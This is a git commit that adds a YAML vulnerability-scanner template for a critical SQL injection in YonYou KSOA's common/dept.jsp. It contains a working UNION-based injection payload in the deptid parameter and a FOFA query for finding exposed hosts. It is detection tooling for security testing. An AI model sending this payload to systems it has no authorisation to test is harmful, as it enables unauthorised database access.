Create yonyou-ksoa-dept-sqli.yaml

2023-12-26 07:50:21 +05:30 · 2023-12-26 07:50:21 +05:30 · 9779076140
parent 1919622dc6
commit 9779076140
1 changed files with 38 additions and 0 deletions
--- a/http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml
@ -0,0 +1,38 @@
+id: yonyou-ksoa-dept-sqli
+
+info:
+  name: YonYou KSOA common/dept.jsp - SQL injection
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    Yonyou KSOA contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
+  reference:
+    - https://mp.weixin.qq.com/s/I6aG2vFIi5nbVZfuVNpyDw
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: app="用友-时空KSOA"
+  tags: yonyou,oa,sqli,ksoa
+
+variables:
+  num: "999999999"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/common/dept.jsp?deptid=1'+UNION+ALL+SELECT+60%2Csys.fn_sqlvarbasetostr(HASHBYTES('MD5'%2C'{{num}}'))--+"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '0x{{md5({{num}})}}'
+
+      - type: status
+        status:
+          - 200